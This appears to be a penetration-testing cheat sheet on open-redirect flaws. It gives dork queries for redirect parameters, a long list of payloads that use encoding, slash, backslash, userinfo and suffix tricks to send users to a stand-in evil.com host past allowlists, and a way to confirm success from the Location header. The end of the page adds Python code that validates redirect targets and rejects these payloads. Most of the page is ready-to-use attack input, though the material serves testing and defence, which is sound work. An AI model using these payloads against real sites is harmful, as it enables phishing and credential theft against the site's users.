Open-Redirects

How to find entry points to test?

  • Caido HTTP history (look at URLs with parameters)

  • Google dorking

    site:target.com inurl:(go= OR return= OR r_url= OR returnUrl= OR returnUri= OR locationUrl= OR goTo= OR return_url= OR next= OR continue= OR checkout_url= OR dest= OR destination= OR image_url= OR redirect= OR redir= OR return_path= OR return_to= OR rurl= OR target= OR view=)
  • Functionalities usually associated with redirects:

    • Login, Logout, Register & Password reset pages
    • Change site language
    • Links in emails
  • Read JavaScript code

  • Brute-forcing with ffuf or Caido (see the payload list below)

Payload

/〱evil.com
〱evil.com
$2f%2fevil.com
$2f%2fevil.com%2f%2f
%01https://evil.com
/%09/evil.com
//%09/evil.com
///%09/evil.com
////%09/evil.com
/%09/[email protected]
//%09/[email protected]
///%09/[email protected]
////%09/[email protected]
%2f$2fevil.com
/%2f%2fevil.com
//%2f%2fevil.com
%2fevil.com
%2fevil.com//
%2fevil.com%2f%2f
/%5cevil.com
/%[email protected]
//%[email protected]
///%[email protected]
////%[email protected]
/cgi-bin/redirect.cgi?https://evil.com
?checkout_url=https://evil.com
?continue=https://evil.com
?dest=https://evil.com
?destination=https://evil.com
//evil%00.com
/\evil%252ecom
evil%252ecom
../evil.com
.evil.com
/.evil.com
/////evil.com
/////evil.com/
////\;@evil.com
////evil.com
////evil.com/
////evil.com//
///;@evil.com
///\;@evil.com
///evil.com
///evil.com/
///evil.com//
//;@evil.com
//\/evil.com/
//\evil.com
//evil.com
//evil.com/
//evil.com//
/<>//evil.com
/\/\/evil.com/
/\/evil.com
/\/evil.com/
/\evil.com
/evil.com
<>//evil.com
@evil.com
\/\/evil.com/
evil.com
evil.com%[email protected]
////evil.com/%2e%2e
///evil.com/%2e%2e
//evil.com/%2e%2e
/evil.com/%2e%2e
//evil.com/%2E%2E
////evil.com/%2e%2e%2f
///evil.com/%2e%2e%2f
//evil.com/%2e%2e%2f
////evil.com/%2f..
///evil.com/%2f..
//evil.com/%2f..
//evil.com/%2F..
/evil.com/%2F..
////evil.com/%2f%2e%2e
///evil.com/%2f%2e%2e
//evil.com/%2f%2e%2e
/evil.com/%2f%2e%2e
//evil.com//%2F%2E%2E
//evil.com:80#@whitelisted.com/
//evil.com:[email protected]/
evil.com/.jpg
//evil.com\twhitelisted.com/
//evil.com/whitelisted.com
//evil.com\@whitelisted.com
evil.com/whitelisted.com
//evil%E3%80%82com
?go=https://evil.com
http:%0a%0devil.com
/http://evil.com
/http:/evil.com
http://.evil.com
http://;@evil.com
http://evil.com
http:/\/\evil.com
http:/evil.com
http:evil.com
http://evil.com%23.whitelisted.com/
http://evil.com%2f%2f.whitelisted.com/
http://evil.com%3F.whitelisted.com/
http://evil.com%5c%5c.whitelisted.com/
http://evil.com:80#@whitelisted.com/
http://evil.com:[email protected]/
http://evil.com\twhitelisted.com/
/https://%09/evil.com
https://%09/evil.com
https://%09/[email protected]
https://%0a%0devil.com
/https:/%5cevil.com/
/https://%5cevil.com
https:/%5cevil.com/
https://%5cevil.com
/https://%[email protected]
https://%[email protected]
//https://evil.com//
/https://evil.com
/https://evil.com/
/https://evil.com//
/https:evil.com
https://////evil.com
https://evil.com
https://evil.com/
https://evil.com//
https:/\evil.com
https:evil.com
//https:///evil.com/%2e%2e
/https://evil.com/%2e%2e
https:///evil.com/%2e%2e
//https://evil.com/%2e%2e%2f
https://evil.com/%2e%2e%2f
/https://evil.com/%2f..
https://evil.com/%2f..
/https:///evil.com/%2f%2e%2e
/https://evil.com/%2f%2e%2e
https:///evil.com/%2f%2e%2e
https://evil.com/%2f%2e%2e
https://:@evil.com\@whitelisted.com
https://evil.com#whitelisted.com
https://evil.com/whitelisted.com
https://evil.com?whitelisted.com
https://evil.com\whitelisted.com
https://evil%E3%80%82com
//https://[email protected]//
/https://[email protected]/
https://whitelisted.com.evil.com
https://whitelisted.com;@evil.com
https://[email protected]
https://[email protected]/
https://[email protected]//
/https://[email protected]/%2e%2e
https:///[email protected]/%2e%2e
//https://[email protected]/%2e%2e%2f
https://[email protected]/%2e%2e%2f
/https://[email protected]/%2f..
https://[email protected]/%2f..
/https:///[email protected]/%2f%2e%2e
/https://[email protected]/%2f%2e%2e
https:///[email protected]/%2f%2e%2e
https://[email protected]/%2f%2e%2e
https://whitelisted.com/https://evil.com/
@https://www.evil.com
http://[email protected]/
?image_url=https://evil.com
/login?to=https://evil.com
?next=https://evil.com
/out/https://evil.com
/out?https://evil.com
/redirect/https://evil.com
?redirect=https://evil.com
?redirect_uri=https://evil.com
?redirect_url=https://evil.com
?redir=https://evil.com
?return=https://evil.com
?return_path=https://evil.com
?return_to=https://evil.com
?returnTo=https://evil.com
?rurl=https://evil.com
?target=https://evil.com
?url=https://evil.com
?view=https://evil.com
/\whitelisted.com:80%40evil.com
whitelisted.com@%E2%80%[email protected]
////[email protected]/
////[email protected]//
///[email protected]/
///[email protected]//
//[email protected]/
//[email protected]//
whitelisted.com.evil.com
whitelisted.com;@evil.com
////[email protected]/%2e%2e
///[email protected]/%2e%2e
////[email protected]/%2e%2e%2f
///[email protected]/%2e%2e%2f
//[email protected]/%2e%2e%2f
////[email protected]/%2f..
///[email protected]/%2f..
//[email protected]/%2f..

In the payloads, replace “whitelisted.com” with a domain the target actually whitelists.

How to check for success?

The most reliable way to confirm a successful Open Redirect is to check the HTTP response headers from the server immediately after submitting the malicious payload.

A successful exploitation results in an HTTP status code indicating a redirection (usually 301, 302, 307, or 303) and the presence of a Location header pointing to your external, unauthorized domain (evil.com).

Caido HTTPQL Filter

To quickly filter your Caido history for potential successes, use the following HTTPQL query; it keeps only responses whose Location header points somewhere other than the expected redirect domain.

resp.raw.ncont:"location: https:\/\/target.com"

Tips

  • Try using the same parameter twice: ?next=whitelisted.com&next=google.com
  • If the file extension is checked, try ?image_url={payload}/.jpg
  • Try target.com/?redirect_url=.uk. If it redirects to target.com.uk, then it’s vulnerable! target.com.uk and target.com are different domains.
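Added example, not code from the original page: a Python redirect validator that refuses the payload classes listed above (protocol-relative, backslash, tab/newline, userinfo, suffix and substring tricks), beside the naive check those payloads defeat and a triage helper for the status-code-plus-Location test described under “How to check for success?”. target.com and whitelisted.com are constructed stand-ins for the site’s own origin and its allowlist.

```python
from typing import Optional
from urllib.parse import unquote, urljoin, urlsplit

# Constructed for this example: the site's own origin and the hosts it may send users to.
BASE = "https://target.com/"
ALLOWED_HOSTS = {"target.com", "whitelisted.com"}
REDIRECT_CODES = {301, 302, 303, 307, 308}


def naive_is_safe(target: str) -> bool:
    """The check the payload list defeats: 'starts with /' or 'mentions an allowed host'."""
    return target.startswith("/") or any(h in target for h in ALLOWED_HOSTS)


def _resolve_if_allowed(candidate: str) -> Optional[str]:
    # Browsers drop tabs and newlines, treat '\' as '/', and skip every leading slash, so
    # '/%09/evil.com', '/\evil.com' and '////evil.com' all land on evil.com. Refuse those
    # classes outright (space included, conservatively) rather than mimic the browser parser.
    if "\\" in candidate or candidate.startswith("//"):
        return None
    if any(ord(c) <= 0x20 or ord(c) == 0x7F for c in candidate):
        return None
    try:
        parts = urlsplit(candidate)
    except ValueError:                            # e.g. malformed bracketed IPv6 host
        return None
    if parts.scheme == "" and parts.netloc == "":
        return urljoin(BASE, candidate)           # plain local path such as "/account"
    if parts.scheme not in ("http", "https") or parts.username is not None:
        return None                               # 'whitelisted.com@evil.com' family
    if parts.hostname not in ALLOWED_HOSTS:       # exact match: no suffix or substring tricks
        return None
    return candidate


def safe_redirect(target: str) -> Optional[str]:
    """Absolute URL for the Location header, or None if the target must be refused.
    Raw and percent-decoded forms must both pass: 'https://whitelisted.com%2f%2f@evil.com'
    parses as host whitelisted.com once decoded but as userinfo@evil.com in a browser."""
    resolved = _resolve_if_allowed(target)
    if resolved is None or _resolve_if_allowed(unquote(target)) is None:
        return None
    return resolved


def is_external_redirect(status: int, location: Optional[str]) -> bool:
    """Triage a captured response: a 3xx whose Location would leave the allowed hosts."""
    if status not in REDIRECT_CODES or location is None:
        return False
    return safe_redirect(location) is None
```

Run each payload from the list through both naive_is_safe and safe_redirect to see which checks each one slips past; is_external_redirect is the programmatic form of the HTTPQL filter above.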

Open Redirects Challenges